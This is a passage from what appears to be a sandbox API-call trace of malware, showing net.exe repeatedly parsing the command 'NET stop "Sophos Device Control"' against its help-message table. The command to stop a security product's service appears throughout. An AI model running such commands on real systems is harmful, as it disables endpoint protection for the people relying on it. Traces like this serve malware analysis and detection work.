ΓÇ£Sophos Device Control", _String2="NET SESSION\r\n[\\\\computername] [/D", _MaxCount=0x21) returned 15 [0037.513] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.513] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="墀[⡋瓢)㾐[)") returned 0x234 [0037.513] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device Control", _String2="NET SHARE\r\nsharename\r\n s", _MaxCount=0x21) returned 12 [0037.513] LocalFree (hMem=0x5b5880) returned 0x0 [0037.513] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)墀[)") returned 0x13 [0037.513] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device Control", _String2="NET START BROWSER\r\n", _MaxCount=0x21) returned 14 [0037.513] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.513] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)㾐[)") returned 0x14 [0037.513] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device Control", _String2="NET START CLIPBOOK\r\n", _MaxCount=0x21) returned 14 [0037.514] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.514] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)㾐[)") returned 0x14 [0037.514] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device Control", _String2="NET START EVENTLOG\r\n", _MaxCount=0x21) returned 14 [0037.514] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.514] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)㾐[)") returned 0x15 [0037.514] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device Control", _String2="NET START MESSENGER\r\n", _MaxCount=0x21) returned 14 [0037.514] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.514] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)㾐[)") returned 0x15 [0037.514] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device Control", _String2="NET START NET LOGON\r\n", _MaxCount=0x21) returned 14 [0037.514] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.514] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)㾐[)") returned 0x16 [0037.514] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device Control", _String2="NET START RPCLOCATOR\r\n", _MaxCount=0x21) returned 14 [0037.514] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.514] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)㾐[)") returned 0x11 [0037.514] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device Control", _String2="NET START RPCSS\r\n", _MaxCount=0x21) returned 14 [0037.514] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.514] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)㾐[)") returned 0x14 [0037.514] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device Control", _String2="NET START SCHEDULE\r\n", _MaxCount=0x21) returned 14 [0037.514] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.514] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)㾐[)") returned 0x12 [0037.514] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device Control", _String2="NET START SERVER\r\n", _MaxCount=0x21) returned 14 [0037.514] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.514] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)㾐[)") returned 0xf [0037.514] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device Control", _String2="NET START UPS\r\n", _MaxCount=0x21) returned 14 [0037.514] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.514] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)㾐[)") returned 0x17 [0037.514] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device Control", _String2="NET START WORKSTATION\r\n", _MaxCount=0x21) returned 14 [0037.514] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.514] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)㾐[)") returned 0x18 [0037.514] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device Control", _String2="NET START\r\n[service]\r\n\r\n", _MaxCount=0x21) returned 14 [0037.514] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.514] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)㾐[)") returned 0x2a [0037.514] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device Control", _String2="NET STATISTICS\r\n[WORKSTATION | SE", _MaxCount=0x21) returned 14 [0037.514] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.514] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)㾐[)") returned 0x15 [0037.514] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device Control", _String2="NET STOP\r\nservice\r\n\r\n", _MaxCount=0x21) returned 19 [0037.514] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.514] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc4d, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="墀[⡋瓢)㾐[)") returned 0x58 [0037.514] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device Control", _String2="NET TIME\r\n\r\n[\\\\computername | /DO", _MaxCount=0x21) returned -1 [0037.515] LocalFree (hMem=0x5b5880) returned 0x0 [0037.515] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc50, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="墀[⡋瓢)墀[)") returned 0x184 [0037.515] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device Control", _String2="NET USE\r\n[devicename | *] [\\\\comp", _MaxCount=0x21) returned -2 [0037.515] LocalFree (hMem=0x5b5880) returned 0x0 [0037.515] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc53, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="墀[⡋瓢)墀[)") returned 0xc7 [0037.515] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device Control", _String2="NET USER\r\n[username [password | *", _MaxCount=0x21) returned -2 [0037.515] LocalFree (hMem=0x5b5880) returned 0x0 [0037.515] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc56, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="墀[⡋瓢)墀[)") returned 0x47 [0037.515] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device Control", _String2="NET VIEW\r\n[\\\\computername [/CACHE", _MaxCount=0x21) returned -3 [0037.515] LocalFree (hMem=0x5b5880) returned 0x0 [0037.515] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc59, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="墀[⡋瓢)墀[)") returned 0xc2 [0037.515] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device Control", _String2="NET\r\n [ ACCOUNTS | COMPUTER | ", _MaxCount=0x21) returned 19 [0037.515] LocalFree (hMem=0x5b5880) returned 0x0 [0037.515] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc5c, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="墀[⡋瓢)墀[)") returned 0x319 [0037.515] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device Control", _String2="SERVICES\r\nNET START can be used t", _MaxCount=0x21) returned -5 [0037.515] LocalFree (hMem=0x5b5880) returned 0x0 [0037.515] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc5f, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="墀[⡋瓢)墀[)") returned 0x483 [0037.515] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device Control", _String2="SYNTAX\r\nThe following conventions", _MaxCount=0x21) returned -5 [0037.515] LocalFree (hMem=0x5b5880) returned 0x0 [0037.515] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc62, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="墀[⡋瓢)墀[)") returned 0xa86 [0037.515] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device Control", _String2="NAMES\r\nThe following types of nam", _MaxCount=0x21) returned 4 [0037.515] LocalFree (hMem=0x5b5880) returned 0x0 [0037.515] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc65, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="墀[⡋瓢)墀[)") returned 0x54 [0037.515] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device Control", _String2="\r\nFor more information on tools s", _MaxCount=0x21) returned 97 [0037.515] LocalFree (hMem=0x5b5880) returned 0x0 [0037.515] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="墀[⡋瓢)墀[)") returned 0xad [0037.515] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device", _String2="NET ACCOUNTS\r\n[/FORCELOGO", _MaxCount=0x19) returned 18 [0037.515] LocalFree (hMem=0x5b5880) returned 0x0 [0037.515] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)墀[)") returned 0x2e [0037.515] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device", _String2="NET COMPUTER\r\n\\\\computern", _MaxCount=0x19) returned 16 [0037.515] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.515] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="墀[⡋瓢)㾐[)") returned 0x7d [0037.515] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device", _String2="NET CONFIG SERVER\r\n[/AUTO", _MaxCount=0x19) returned 16 [0037.515] LocalFree (hMem=0x5b5880) returned 0x0 [0037.515] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)墀[)") returned 0x26 [0037.515] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device", _String2="NET CONFIG\r\n[SERVER | WOR", _MaxCount=0x19) returned 16 [0037.515] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.516] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)㾐[)") returned 0x19 [0037.516] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device", _String2="NET CONTINUE\r\nservice\r\n\r\n", _MaxCount=0x19) returned 16 [0037.516] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.516] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)㾐[)") returned 0x1b [0037.516] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device", _String2="NET FILE\r\n[id [/CLOSE]]\r\n", _MaxCount=0x19) returned 13 [0037.516] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.516] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="墀[⡋瓢)㾐[)") returned 0xbe [0037.516] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device", _String2="NET GROUP\r\n[groupname [/C", _MaxCount=0x19) returned 12 [0037.516] LocalFree (hMem=0x5b5880) returned 0x0 [0037.516] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)墀[)") returned 0x33 [0037.516] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device", _String2="NET HELP\r\ncommand\r\n -", _MaxCount=0x19) returned 11 [0037.516] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.516] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)㾐[)") returned 0x19 [0037.516] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device", _String2="NET HELPMSG\r\nmessage#\r\n\r\n", _MaxCount=0x19) returned 11 [0037.516] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.516] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="墀[⡋瓢)㾐[)") returned 0xc1 [0037.516] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device", _String2="NET LOCALGROUP\r\n[groupnam", _MaxCount=0x19) returned 7 [0037.516] LocalFree (hMem=0x5b5880) returned 0x0 [0037.516] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)墀[)") returned 0x16 [0037.516] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device", _String2="NET PAUSE\r\nservice\r\n\r\n", _MaxCount=0x19) returned 3 [0037.516] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.516] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)㾐[)") returned 0x33 [0037.516] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device", _String2="NET SESSION\r\n[\\\\computern", _MaxCount=0x19) returned 15 [0037.516] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.516] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="墀[⡋瓢)㾐[)") returned 0x234 [0037.516] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device", _String2="NET SHARE\r\nsharename\r\n ", _MaxCount=0x19) returned 12 [0037.516] LocalFree (hMem=0x5b5880) returned 0x0 [0037.516] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)墀[)") returned 0x13 [0037.516] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device", _String2="NET START BROWSER\r\n", _MaxCount=0x19) returned 14 [0037.516] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.516] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)㾐[)") returned 0x14 [0037.516] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device", _String2="NET START CLIPBOOK\r\n", _MaxCount=0x19) returned 14 [0037.516] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.516] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)㾐[)") returned 0x14 [0037.516] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device", _String2="NET START EVENTLOG\r\n", _MaxCount=0x19) returned 14 [0037.516] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.516] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)㾐[)") returned 0x15 [0037.517] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device", _String2="NET START MESSENGER\r\n", _MaxCount=0x19) returned 14 [0037.517] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.517] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)㾐[)") returned 0x15 [0037.517] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device", _String2="NET START NET LOGON\r\n", _MaxCount=0x19) returned 14 [0037.517] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.517] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)㾐[)") returned 0x16 [0037.517] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device", _String2="NET START RPCLOCATOR\r\n", _MaxCount=0x19) returned 14 [0037.517] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.517] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)㾐[)") returned 0x11 [0037.517] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device", _String2="NET START RPCSS\r\n", _MaxCount=0x19) returned 14 [0037.517] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.517] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)㾐[)") returned 0x14 [0037.517] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device", _String2="NET START SCHEDULE\r\n", _MaxCount=0x19) returned 14 [0037.517] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.517] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)㾐[)") returned 0x12 [0037.517] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device", _String2="NET START SERVER\r\n", _MaxCount=0x19) returned 14 [0037.517] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.517] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)㾐[)") returned 0xf [0037.517] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device", _String2="NET START UPS\r\n", _MaxCount=0x19) returned 14 [0037.517] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.517] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)㾐[)") returned 0x17 [0037.517] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device", _String2="NET START WORKSTATION\r\n", _MaxCount=0x19) returned 14 [0037.517] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.517] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)㾐[)") returned 0x18 [0037.517] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device", _String2="NET START\r\n[service]\r\n\r\n", _MaxCount=0x19) returned 14 [0037.517] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.517] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)㾐[)") returned 0x2a [0037.517] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device", _String2="NET STATISTICS\r\n[WORKSTAT", _MaxCount=0x19) returned 14 [0037.517] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.517] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)㾐[)") returned 0x15 [0037.517] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device", _String2="NET STOP\r\nservice\r\n\r\n", _MaxCount=0x19) returned 19 [0037.517] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.517] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc4d, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="颀[⡋瓢)㾐[)") returned 0x58 [0037.517] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device", _String2="NET TIME\r\n\r\n[\\\\computerna", _MaxCount=0x19) returned -1 [0037.517] LocalFree (hMem=0x5b9880) returned 0x0 [0037.518] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc50, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="颀[⡋瓢)颀[)") returned 0x184 [0037.518] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device", _String2="NET USE\r\n[devicename | *]", _MaxCount=0x19) returned -2 [0037.518] LocalFree (hMem=0x5b9880) returned 0x0 [0037.518] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc53, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="颀[⡋瓢)颀[)") returned 0xc7 [0037.518] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device", _String2="NET USER\r\n[username [pass", _MaxCount=0x19) returned -2 [0037.518] LocalFree (hMem=0x5b9880) returned 0x0 [0037.518] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc56, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="颀[⡋瓢)颀[)") returned 0x47 [0037.518] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device", _String2="NET VIEW\r\n[\\\\computername", _MaxCount=0x19) returned -3 [0037.518] LocalFree (hMem=0x5b9880) returned 0x0 [0037.518] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc59, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="颀[⡋瓢)颀[)") returned 0xc2 [0037.518] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device", _String2="NET\r\n [ ACCOUNTS | COM", _MaxCount=0x19) returned 19 [0037.518] LocalFree (hMem=0x5b9880) returned 0x0 [0037.518] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc5c, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="颀[⡋瓢)颀[)") returned 0x319 [0037.518] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device", _String2="SERVICES\r\nNET START can b", _MaxCount=0x19) returned -5 [0037.518] LocalFree (hMem=0x5b9880) returned 0x0 [0037.518] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc5f, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="颀[⡋瓢)颀[)") returned 0x483 [0037.518] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device", _String2="SYNTAX\r\nThe following con", _MaxCount=0x19) returned -5 [0037.518] LocalFree (hMem=0x5b9880) returned 0x0 [0037.518] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc62, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="颀[⡋瓢)颀[)") returned 0xa86 [0037.518] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device", _String2="NAMES\r\nThe following type", _MaxCount=0x19) returned 4 [0037.518] LocalFree (hMem=0x5b9880) returned 0x0 [0037.518] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc65, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="颀[⡋瓢)颀[)") returned 0x54 [0037.518] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Device", _String2="\r\nFor more information on", _MaxCount=0x19) returned 97 [0037.518] LocalFree (hMem=0x5b9880) returned 0x0 [0037.518] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="颀[⡋瓢)颀[)") returned 0xad [0037.518] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET ACCOUNTS\r\n[/FO", _MaxCount=0x12) returned 18 [0037.518] LocalFree (hMem=0x5b9880) returned 0x0 [0037.518] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="㾐[⡋瓢)颀[)") returned 0x2e [0037.518] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET COMPUTER\r\n\\\\co", _MaxCount=0x12) returned 16 [0037.519] LocalFree (hMem=0x5b3f90) returned 0x0 [0037.519] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x29f7d4, nSize=0x0, Arguments=0x29f7d0 | out: lpBuffer="颀[⡋瓢)㾐[)") returned 0x7d [0037.519] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET CONFIG SERVER\r", 